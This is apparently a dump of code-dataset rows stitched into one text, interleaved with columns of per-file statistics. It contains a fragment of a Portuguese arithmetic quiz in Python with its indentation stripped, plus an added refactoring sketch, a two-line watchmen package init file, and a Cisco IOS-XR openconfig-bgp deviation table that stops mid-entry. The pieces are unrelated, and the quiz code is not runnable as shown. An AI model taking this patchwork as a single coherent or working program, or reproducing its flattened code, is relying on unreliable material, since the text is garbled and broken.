n1 = randint(100, 500)
n2 = randint(100, 500)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(1000, 3000)
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} x {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
else:
if type(resultado) == int:
if resultado == n1 * n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 * n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da multiplicacao\033[m')
elif simbolo_matematico == 4: # Division
if dificuldade == 1:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(2, 100)
n2 = randint(2, 100)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 2:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(20, 150)
n2 = randint(2, 150)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 3:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(100, 500)
n2 = randint(2, 500)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
elif dificuldade == 4:
pular(30)
print(f'\033[;31m{"Resolva o calculo":^50}\033[m')
print(f'{"Digite 0 para voltar":^50}')
pular(5)
while True:
n1 = randint(1000, 3000)
n2 = randint(2, 3000)
if n1 % n2 == 0 and n1 > n2:
try:
pular(2)
print('__' * 15)
resultado = int(input(f'{n1} / {n2} = '))
except:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
else:
if type(resultado) == int:
if resultado == n1 / n2:
print('\n\n\033[1;32mParabens\033[m!! Voce acertou.')
elif resultado == 0:
break
else:
print(
f'\n\nVoce \033[1;31merrou\033[m...\nA resposta era \033[;1m{n1 / n2}\033[m.')
else:
print('\n\n\033[1;31mDigite o resultado da divisao\033[m')
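# Illustrative sketch (not part of the original file): the four nearly identical
# branches of calculo() could be collapsed into a lookup table mapping the menu
# codes to an operator and a difficulty range. Names below are hypothetical;
# only the standard library (operator, plus randint already imported above) is used.
import operator

_OPERACOES = {1: ('+', operator.add), 2: ('-', operator.sub),
              3: ('x', operator.mul), 4: ('/', operator.floordiv)}
_DIFICULDADES = {1: (1, 100), 2: (20, 150), 3: (100, 500), 4: (1000, 3000)}


def calculo_compacto(simbolo_matematico, dificuldade):
    """Hypothetical compact version: builds one exercise and checks the answer."""
    simbolo, funcao = _OPERACOES[simbolo_matematico]
    minimo, maximo = _DIFICULDADES[dificuldade]
    n1, n2 = randint(minimo, maximo), randint(minimo, maximo)
    if simbolo == '-' and n1 < n2:    # keep subtraction results non-negative
        n1, n2 = n2, n1
    if simbolo == '/':                # force an exact integer division
        n2 = randint(2, maximo)
        n1 = n2 * randint(1, maximo // n2)
    resposta = int(input(f'{n1} {simbolo} {n2} = '))
    return resposta == funcao(n1, n2)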
| 40.919386
| 116
| 0.393874
| 2,255
| 21,319
| 3.702439
| 0.066075
| 0.049347
| 0.040244
| 0.057492
| 0.84573
| 0.826925
| 0.825009
| 0.805126
| 0.805126
| 0.805126
| 0
| 0.137783
| 0.48492
| 21,319
| 520
| 117
| 40.998077
| 0.621983
| 0.07491
| 0
| 0.922727
| 0
| 0.036364
| 0.266098
| 0.053199
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011364
| false
| 0
| 0.002273
| 0
| 0.013636
| 0.295455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9504bf6bd55f14bbf36d7503f8289596841f780
| 108
|
py
|
Python
|
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-meta/src/watchmen_meta/analysis/__init__.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
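# Package-level re-exports so the analysis services can be imported straight from watchmen_meta.analysis.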
from .pipeline_index_service import PipelineIndexService
from .topic_index_service import TopicIndexService
| 36
| 56
| 0.907407
| 12
| 108
| 7.833333
| 0.666667
| 0.255319
| 0.382979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 57
| 54
| 0.94
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d993e6829d30bcdd16990a42ad2fcd53d118ea63
| 60,066
|
py
|
Python
|
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/_deviate/_cisco_xr_openconfig_bgp_deviations.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.providers._importer import _yang_ns
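# Deviation metadata for Cisco IOS-XR's implementation of the openconfig-bgp model.
# Each key is a YANG schema node path and each value describes how that node deviates:
#   'deviation_typ'  : one of 'not_supported', 'add' or 'replace'
#   'keyword_value'  : optional list of (keyword, value) pairs that are added or
#                      replaced, such as a 'default' value or a 'must' constraint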
_deviation_table = {
'Bgp.Global_.AfiSafis.AfiSafi.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.AfiSafis.AfiSafi.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp.Config.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp.State.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.Confederation.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.Global_.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.Global_.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Ebgp.Config.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Global_.UseMultiplePaths.Ebgp.State.allow_multiple_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.Config.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.Config.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.State.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AddPaths.State.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.advertised' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.GracefulRestart.State.received' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.Neighbors.Neighbor.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
